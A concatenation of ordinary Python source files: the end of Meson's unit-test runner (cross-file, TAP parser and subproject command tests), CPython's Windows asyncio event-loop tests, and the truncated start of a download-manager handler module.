self.wipe() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) # If XDG_DATA_HOME is set in the environment running the # tests this test will fail, os mock the environment, pop # it, then test with mock.patch.dict(os.environ): os.environ.pop('XDG_DATA_HOME', None) with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() def helper_create_cross_file(self, values): """Create a config file as a temporary file. values should be a nested dictionary structure of {section: {key: value}} """ filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config)) self.current_config += 1 with open(filename, 'wt') as f: for section, entries in values.items(): f.write('[{}]\n'.format(section)) for k, v in entries.items(): f.write("{}='{}'\n".format(k, v)) return filename def test_cross_file_dirs(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_cross_file_dirs_overriden(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_libdir=liblib', '-Dlibdir=liblib', '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_cross_file_dirs_chain(self): # crossfile2 overrides crossfile overrides nativefile testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '--cross-file', os.path.join(testcase, 'crossfile2'), '-Ddef_bindir=binbar2', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_user_options(self): # This is just a touch test for cross file, since the implementation # shares code after loading from the files testcase = os.path.join(self.common_test_dir, '41 options') config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--cross-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--cross-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('No c++ standard set?') def test_builtin_options_per_machine(self): """Test options that are allowed to be set on a per-machine basis. Such options could be passed twice, once for the build machine, and once for the host machine. I've picked pkg-config path, but any would do that can be set for both. """ testcase = os.path.join(self.common_test_dir, '2 cpp') cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}}) native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}}) # Ensure that PKG_CONFIG_PATH is not set in the environment with mock.patch.dict('os.environ'): for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']: try: del os.environ[k] except KeyError: pass self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross/path']) found += 1 elif each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++17') found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native/path']) found += 1 elif each['name'] == 'build.cpp_std': self.assertEqual(each['value'], 'c++14') found += 1 if found == 4: break self.assertEqual(found, 4, 'Did not find all sections.') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}}) cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}}) self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross], override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'}) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross']) found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native']) found += 1 if found == 2: break self.assertEqual(found, 2, 'Did not find all sections.') class TAPParserTests(unittest.TestCase): def assert_test(self, events, **kwargs): if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Test(**kwargs)) def assert_plan(self, events, **kwargs): if 'skipped' not in kwargs: kwargs['skipped'] = False if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Plan(**kwargs)) def assert_version(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Version(**kwargs)) def assert_error(self, events): self.assertEqual(type(next(events)), TAPParser.Error) def assert_bailout(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Bailout(**kwargs)) def assert_last(self, events): with self.assertRaises(StopIteration): next(events) def parse_tap(self, s): parser = TAPParser(io.StringIO(s)) return iter(parser.parse()) def parse_tap_v13(self, s): events = self.parse_tap('TAP version 13\n' + s) self.assert_version(events, version=13) return events def test_empty(self): events = self.parse_tap('') self.assert_last(events) def test_empty_plan(self): events = self.parse_tap('1..0') self.assert_plan(events, count=0, late=False, skipped=True) self.assert_last(events) def test_plan_directive(self): events = self.parse_tap('1..0 # skipped for some reason') self.assert_plan(events, count=0, late=False, skipped=True, explanation='for some reason') self.assert_last(events) events = self.parse_tap('1..1 # skipped for some reason\nok 1') self.assert_error(events) self.assert_plan(events, count=1, late=False, skipped=True, explanation='for some reason') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('1..1 # todo not supported here\nok 1') self.assert_error(events) self.assert_plan(events, count=1, late=False, skipped=False, explanation='not supported here') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_ok(self): events = self.parse_tap('ok') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_with_number(self): events = self.parse_tap('ok 1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_with_name(self): events = self.parse_tap('ok 1 abc') self.assert_test(events, number=1, name='abc', result=TestResult.OK) self.assert_last(events) def test_one_test_not_ok(self): events = self.parse_tap('not ok') self.assert_test(events, number=1, name='', result=TestResult.FAIL) self.assert_last(events) def test_one_test_todo(self): events = self.parse_tap('not ok 1 abc # TODO') self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL) self.assert_last(events) events = self.parse_tap('ok 1 abc # TODO') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS) self.assert_last(events) def test_one_test_skip(self): events = self.parse_tap('ok 1 abc # SKIP') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP) self.assert_last(events) def test_one_test_skip_failure(self): events = self.parse_tap('not ok 1 abc # SKIP') self.assert_test(events, number=1, name='abc', result=TestResult.FAIL) self.assert_last(events) def test_many_early_plan(self): events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4') self.assert_plan(events, count=4, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_test(events, number=3, name='', result=TestResult.OK) self.assert_test(events, number=4, name='', result=TestResult.FAIL) self.assert_last(events) def test_many_late_plan(self): events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_test(events, number=3, name='', result=TestResult.OK) self.assert_test(events, number=4, name='', result=TestResult.FAIL) self.assert_plan(events, count=4, late=True) self.assert_last(events) def test_directive_case(self): events = self.parse_tap('ok 1 abc # skip') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP) self.assert_last(events) events = self.parse_tap('ok 1 abc # ToDo') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS) self.assert_last(events) def test_directive_explanation(self): events = self.parse_tap('ok 1 abc # skip why') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP, explanation='why') self.assert_last(events) events = self.parse_tap('ok 1 abc # ToDo Because') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS, explanation='Because') self.assert_last(events) def test_one_test_early_plan(self): events = self.parse_tap('1..1\nok') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_late_plan(self): events = self.parse_tap('ok\n1..1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, count=1, late=True) self.assert_last(events) def test_out_of_order(self): events = self.parse_tap('ok 2') self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) def test_middle_plan(self): events = self.parse_tap('ok 1\n1..2\nok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, count=2, late=True) self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) def test_too_many_plans(self): events = self.parse_tap('1..1\n1..2\nok 1') self.assert_plan(events, count=1, late=False) self.assert_error(events) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_too_many(self): events = self.parse_tap('ok 1\nnot ok 2\n1..1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_plan(events, count=1, late=True) self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..1\nok 1\nnot ok 2') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_error(events) self.assert_last(events) def test_too_few(self): events = self.parse_tap('ok 1\nnot ok 2\n1..3') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_plan(events, count=3, late=True) self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..3\nok 1\nnot ok 2') self.assert_plan(events, count=3, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_error(events) self.assert_last(events) def test_too_few_bailout(self): events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test') self.assert_plan(events, count=3, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_bailout(events, message='no third test') self.assert_last(events) def test_diagnostics(self): events = self.parse_tap('1..1\n# ignored\nok 1') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, count=1, late=True) self.assert_last(events) def test_empty_line(self): events = self.parse_tap('1..1\n\nok 1') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_unexpected(self): events = self.parse_tap('1..1\ninvalid\nok 1') self.assert_plan(events, count=1, late=False) self.assert_error(events) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_version(self): events = self.parse_tap('TAP version 13\n') self.assert_version(events, version=13) self.assert_last(events) events = self.parse_tap('TAP version 12\n') self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..0\nTAP version 13\n') self.assert_plan(events, count=0, late=False, skipped=True) self.assert_error(events) self.assert_last(events) def test_yaml(self): events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_error(events) self.assert_last(events) events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_last(events) class SubprojectsCommandTests(BasePlatformTests): def setUp(self): super().setUp() self.root_dir = Path(self.builddir) self.project_dir = self.root_dir / 'src' self._create_project(self.project_dir) self.subprojects_dir = self.project_dir / 'subprojects' os.makedirs(str(self.subprojects_dir)) def _create_project(self, path, project_name='dummy'): os.makedirs(str(path), exist_ok=True) with open(str(path / 'meson.build'), 'w') as f: f.write("project('{}')".format(project_name)) def _git(self, cmd, workdir): return git(cmd, str(workdir), check=True)[1].strip() def _git_config(self, workdir): self._git(['config', 'user.name', 'Meson Test'], workdir) self._git(['config', 'user.email', 'meson.test@example.com'], workdir) def _git_remote(self, cmd, name): return self._git(cmd, self.root_dir / name) def _git_local(self, cmd, name): return self._git(cmd, self.subprojects_dir / name) def _git_local_branch(self, name): # Same as `git branch --show-current` but compatible with older git version branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name) return branch if branch != 'HEAD' else '' def _git_local_commit(self, name, ref='HEAD'): return self._git_local(['rev-parse', ref], name) def _git_remote_commit(self, name, ref='HEAD'): return self._git_remote(['rev-parse', ref], name) def _git_create_repo(self, path): # If a user has git configuration init.defaultBranch set we want to override that with tempfile.TemporaryDirectory() as d: out = git(['--version'], str(d))[1] if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'): extra_cmd = ['--initial-branch', 'master'] else: extra_cmd = [] self._create_project(path) self._git(['init'] + extra_cmd, path) self._git_config(path) self._git(['add', '.'], path) self._git(['commit', '-m', 'Initial commit'], path) def _git_create_remote_repo(self, name): self._git_create_repo(self.root_dir / name) def _git_create_local_repo(self, name): self._git_create_repo(self.subprojects_dir / name) def _git_create_remote_commit(self, name, branch): self._git_remote(['checkout', branch], name) self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name) def _git_create_remote_branch(self, name, branch): self._git_remote(['checkout', '-b', branch], name) self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name) def _git_create_remote_tag(self, name, tag): self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name) self._git_remote(['tag', tag], name) def _wrap_create_git(self, name, revision='master'): path = self.root_dir / name with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f: f.write(textwrap.dedent( ''' [wrap-git] url={} revision={} '''.format(os.path.abspath(str(path)), revision))) def _wrap_create_file(self, name, tarball='dummy.tar.gz'): path = self.root_dir / tarball with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f: f.write(textwrap.dedent( ''' [wrap-file] source_url={} '''.format(os.path.abspath(str(path))))) def _subprojects_cmd(self, args): return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir)) def test_git_update(self): subp_name = 'sub1' # Create a fake remote git repository and a wrap file. Checks that # "meson subprojects download" works. self._git_create_remote_repo(subp_name) self._wrap_create_git(subp_name) self._subprojects_cmd(['download']) self.assertPathExists(str(self.subprojects_dir / subp_name)) self._git_config(self.subprojects_dir / subp_name) # Create a new remote branch and update the wrap file. Checks that # "meson subprojects update --reset" checkout the new branch. self._git_create_remote_branch(subp_name, 'newbranch') self._wrap_create_git(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Update remote newbranch. Checks the new commit is pulled into existing # local newbranch. Make sure it does not print spurious 'git stash' message. self._git_create_remote_commit(subp_name, 'newbranch') out = self._subprojects_cmd(['update', '--reset']) self.assertNotIn('No local changes to save', out) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Update remote newbranch and switch to another branch. Checks that it # switch current branch to newbranch and pull latest commit. self._git_local(['checkout', 'master'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Stage some local changes then update. Checks that local changes got # stashed. self._create_project(self.subprojects_dir / subp_name, 'new_project_name') self._git_local(['add', '.'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) self.assertTrue(self._git_local(['stash', 'list'], subp_name)) # Create a new remote tag and update the wrap file. Checks that # "meson subprojects update --reset" checkout the new tag in detached mode. self._git_create_remote_tag(subp_name, 'newtag') self._wrap_create_git(subp_name, 'newtag') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), '') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag')) # Create a new remote commit and update the wrap file with the commit id. # Checks that "meson subprojects update --reset" checkout the new commit # in detached mode. self._git_local(['checkout', 'master'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name) self._wrap_create_git(subp_name, new_commit) self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), '') self.assertEqual(self._git_local_commit(subp_name), new_commit) # Create a local project not in a git repository, then update it with # a git wrap. Without --reset it should print error message and return # failure. With --reset it should delete existing project and clone the # new project. subp_name = 'sub2' self._create_project(self.subprojects_dir / subp_name) self._git_create_remote_repo(subp_name) self._wrap_create_git(subp_name) with self.assertRaises(subprocess.CalledProcessError) as cm: self._subprojects_cmd(['update']) self.assertIn('Not a git repository', cm.exception.output) self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name)) @skipIfNoExecutable('true') def test_foreach(self): self._create_project(self.subprojects_dir / 'sub_file') self._wrap_create_file('sub_file') self._git_create_local_repo('sub_git') self._wrap_create_git('sub_git') self._git_create_local_repo('sub_git_no_wrap') def ran_in(s): ret = [] prefix = 'Executing command in ' for l in s.splitlines(): if l.startswith(prefix): ret.append(l[len(prefix):]) return sorted(ret) dummy_cmd = ['true'] out = self._subprojects_cmd(['foreach'] + dummy_cmd) self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap'])) out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd) self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git'])) out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd) self.assertEqual(ran_in(out), ['subprojects/sub_file']) out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd) self.assertEqual(ran_in(out), ['subprojects/sub_git']) def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool: """ check that Clang compiler is at least a specified version, whether AppleClang or regular Clang Parameters ---------- compiler: Meson compiler object minver: str Clang minimum version apple_minver: str AppleCLang minimum version Returns ------- at_least: bool Clang is at least the specified version """ if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler, mesonbuild.compilers.AppleClangCPPCompiler)): return version_compare(compiler.version, apple_minver) return version_compare(compiler.version, minver) def unset_envs(): # For unit tests we must fully control all command lines # so that there are no unexpected changes coming from the # environment, for example when doing a package build. varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values()) for v in varnames: if v in os.environ: del os.environ[v] def convert_args(argv): # If we got passed a list of tests, pass it on pytest_args = ['-v'] if '-v' in argv else [] test_list = [] for arg in argv: if arg.startswith('-'): if arg in ('-f', '--failfast'): arg = '--exitfirst' pytest_args.append(arg) continue # ClassName.test_name => 'ClassName and test_name' if '.' in arg: arg = ' and '.join(arg.split('.')) test_list.append(arg) if test_list: pytest_args += ['-k', ' or '.join(test_list)] return pytest_args def running_single_tests(argv, cases): ''' Check whether we only got arguments for running individual tests, not entire testcases, and not all testcases (no test args). ''' got_test_arg = False for arg in argv: if arg.startswith('-'): continue for case in cases: if not arg.startswith(case): continue if '.' not in arg: # Got a testcase, done return False got_test_arg = True return got_test_arg def main(): unset_envs() cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests', 'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests', 'TAPParserTests', 'SubprojectsCommandTests', 'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests', 'WindowsTests', 'DarwinTests'] try: import pytest # noqa: F401 # Need pytest-xdist for `-n` arg import xdist # noqa: F401 pytest_args = [] # Don't use pytest-xdist when running single unit tests since it wastes # time spawning a lot of processes to distribute tests to in that case. if not running_single_tests(sys.argv, cases): pytest_args += ['-n', 'auto'] pytest_args += ['./run_unittests.py'] pytest_args += convert_args(sys.argv[1:]) return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode except ImportError: print('pytest-xdist not found, using unittest instead') # Fallback to plain unittest. return unittest.main(defaultTest=cases, buffer=True) if __name__ == '__main__': print('Meson build system', mesonbuild.coredata.version, 'Unit Tests') start = time.monotonic() try: raise SystemExit(main()) finally: print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
test_windows_events.py
import os import signal import socket import sys import time import threading import unittest from unittest import mock if sys.platform != 'win32': raise unittest.SkipTest('Windows only') import _overlapped import _winapi import asyncio from asyncio import windows_events from test.test_asyncio import utils as test_utils def tearDownModule(): asyncio.set_event_loop_policy(None) class UpperProto(asyncio.Protocol): def __init__(self): self.buf = [] def connection_made(self, trans): self.trans = trans def data_received(self, data): self.buf.append(data) if b'\n' in data: self.trans.write(b''.join(self.buf).upper()) self.trans.close() class ProactorLoopCtrlC(test_utils.TestCase): def test_ctrl_c(self): def SIGINT_after_delay(): time.sleep(0.1) signal.raise_signal(signal.SIGINT) thread = threading.Thread(target=SIGINT_after_delay) loop = asyncio.get_event_loop() try: # only start the loop once the event loop is running loop.call_soon(thread.start) loop.run_forever() self.fail("should not fall through 'run_forever'") except KeyboardInterrupt: pass finally: self.close_loop(loop) thread.join() class ProactorMultithreading(test_utils.TestCase): def test_run_from_nonmain_thread(self): finished = False async def coro(): await asyncio.sleep(0) def func(): nonlocal finished loop = asyncio.new_event_loop() loop.run_until_complete(coro()) # close() must not call signal.set_wakeup_fd() loop.close() finished = True thread = threading.Thread(target=func) thread.start() thread.join() self.assertTrue(finished) class ProactorTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = asyncio.ProactorEventLoop() self.set_event_loop(self.loop) def test_close(self): a, b = socket.socketpair() trans = self.loop._make_socket_transport(a, asyncio.Protocol()) f = asyncio.ensure_future(self.loop.sock_recv(b, 100), loop=self.loop) trans.close() self.loop.run_until_complete(f) self.assertEqual(f.result(), b'') b.close() def test_double_bind(self): ADDRESS = r'\\.\pipe\test_double_bind-%s' % os.getpid() server1 = windows_events.PipeServer(ADDRESS) with self.assertRaises(PermissionError): windows_events.PipeServer(ADDRESS) server1.close() def test_pipe(self): res = self.loop.run_until_complete(self._test_pipe()) self.assertEqual(res, 'done') async def _test_pipe(self): ADDRESS = r'\\.\pipe\_test_pipe-%s' % os.getpid() with self.assertRaises(FileNotFoundError): await self.loop.create_pipe_connection( asyncio.Protocol, ADDRESS) [server] = await self.loop.start_serving_pipe( UpperProto, ADDRESS) self.assertIsInstance(server, windows_events.PipeServer) clients = [] for i in range(5): stream_reader = asyncio.StreamReader(loop=self.loop) protocol = asyncio.StreamReaderProtocol(stream_reader, loop=self.loop) trans, proto = await self.loop.create_pipe_connection( lambda: protocol, ADDRESS) self.assertIsInstance(trans, asyncio.Transport) self.assertEqual(protocol, proto) clients.append((stream_reader, trans)) for i, (r, w) in enumerate(clients): w.write('lower-{}\n'.format(i).encode()) for i, (r, w) in enumerate(clients): response = await r.readline() self.assertEqual(response, 'LOWER-{}\n'.format(i).encode()) w.close() server.close() with self.assertRaises(FileNotFoundError): await self.loop.create_pipe_connection( asyncio.Protocol, ADDRESS) return 'done' def test_connect_pipe_cancel(self): exc = OSError() exc.winerror = _overlapped.ERROR_PIPE_BUSY with mock.patch.object(_overlapped, 'ConnectPipe', side_effect=exc) as connect: coro = self.loop._proactor.connect_pipe('pipe_address') task = self.loop.create_task(coro) # check that it's possible to cancel connect_pipe() task.cancel() with self.assertRaises(asyncio.CancelledError): self.loop.run_until_complete(task) def test_wait_for_handle(self): event = _overlapped.CreateEvent(None, True, False, None) self.addCleanup(_winapi.CloseHandle, event) # Wait for unset event with 0.5s timeout; # result should be False at timeout fut = self.loop._proactor.wait_for_handle(event, 0.5) start = self.loop.time() done = self.loop.run_until_complete(fut) elapsed = self.loop.time() - start self.assertEqual(done, False) self.assertFalse(fut.result()) # bpo-31008: Tolerate only 450 ms (at least 500 ms expected), # because of bad clock resolution on Windows self.assertTrue(0.45 <= elapsed <= 0.9, elapsed) _overlapped.SetEvent(event) # Wait for set event; # result should be True immediately fut = self.loop._proactor.wait_for_handle(event, 10) start = self.loop.time() done = self.loop.run_until_complete(fut) elapsed = self.loop.time() - start self.assertEqual(done, True) self.assertTrue(fut.result()) self.assertTrue(0 <= elapsed < 0.3, elapsed) # asyncio issue #195: cancelling a done _WaitHandleFuture # must not crash fut.cancel() def test_wait_for_handle_cancel(self): event = _overlapped.CreateEvent(None, True, False, None) self.addCleanup(_winapi.CloseHandle, event) # Wait for unset event with a cancelled future; # CancelledError should be raised immediately fut = self.loop._proactor.wait_for_handle(event, 10) fut.cancel() start = self.loop.time() with self.assertRaises(asyncio.CancelledError): self.loop.run_until_complete(fut) elapsed = self.loop.time() - start self.assertTrue(0 <= elapsed < 0.1, elapsed) # asyncio issue #195: cancelling a _WaitHandleFuture twice # must not crash fut = self.loop._proactor.wait_for_handle(event) fut.cancel() fut.cancel() def test_read_self_pipe_restart(self): # Regression test for https://bugs.python.org/issue39010 # Previously, restarting a proactor event loop in certain states # would lead to spurious ConnectionResetErrors being logged. self.loop.call_exception_handler = mock.Mock() # Start an operation in another thread so that the self-pipe is used. # This is theoretically timing-dependent (the task in the executor # must complete before our start/stop cycles), but in practice it # seems to work every time. f = self.loop.run_in_executor(None, lambda: None) self.loop.stop() self.loop.run_forever() self.loop.stop() self.loop.run_forever() # Shut everything down cleanly. This is an important part of the # test - in issue 39010, the error occurred during loop.close(), # so we want to close the loop during the test instead of leaving # it for tearDown. # # First wait for f to complete to avoid a "future's result was never # retrieved" error. self.loop.run_until_complete(f) # Now shut down the loop itself (self.close_loop also shuts down the # loop's default executor). self.close_loop(self.loop) self.assertFalse(self.loop.call_exception_handler.called) class WinPolicyTests(test_utils.TestCase): def test_selector_win_policy(self): async def main(): self.assertIsInstance( asyncio.get_running_loop(), asyncio.SelectorEventLoop) old_policy = asyncio.get_event_loop_policy() try: asyncio.set_event_loop_policy( asyncio.WindowsSelectorEventLoopPolicy()) asyncio.run(main()) finally: asyncio.set_event_loop_policy(old_policy) def test_proactor_win_policy(self): async def main(): self.assertIsInstance( asyncio.get_running_loop(), asyncio.ProactorEventLoop) old_policy = asyncio.get_event_loop_policy() try: asyncio.set_event_loop_policy( asyncio.WindowsProactorEventLoopPolicy()) asyncio.run(main()) finally: asyncio.set_event_loop_policy(old_policy) if __name__ == '__main__': unittest.main()
DLHandler.py
import logging from DLInfos import * from DLProgress import * from packer import Packer import time, os LOG_FORMAT = "%(asctime)s,%(msecs)03d - %(levelname)s - %(threadName)-12s - (%(progress)s)[%(urlid)s] - %(message)s" logging.basicConfig(format=LOG_FORMAT, datefmt="%m/%d/%Y %H:%M:%S", level=logging.CRITICAL) logger = logging.getLogger('nbdler') __URL_NODE_PARAMS__ = { 'urls': 'url', 'cookies': 'cookie', 'hosts': 'host', 'ports': 'port', 'paths': 'path', 'headers': 'headers', 'max_threads': 'max_thread' } class Handler(Packer, object): def __init__(self): self.url = UrlPool() self.file = File() self.__globalprog__ = GlobalProgress(self, AUTO) self.__new_project__ = True self.__batch_thread__ = None self.globalprog = self.__globalprog__ def uninstall(self): self.globalprog = self.__globalprog__ def install(self, GlobalProgress): self.globalprog = GlobalProgress def __batchAdd__(self, pack_yield): for iter_kw in pack_yield: self.addNode(**iter_kw) def batchAdd(self, wait=True, **kwargs): global __URL_NODE_PARAMS__ pack_yield = [] iter_len = len(kwargs.get('urls', [])) for i in range(iter_len): node = {} 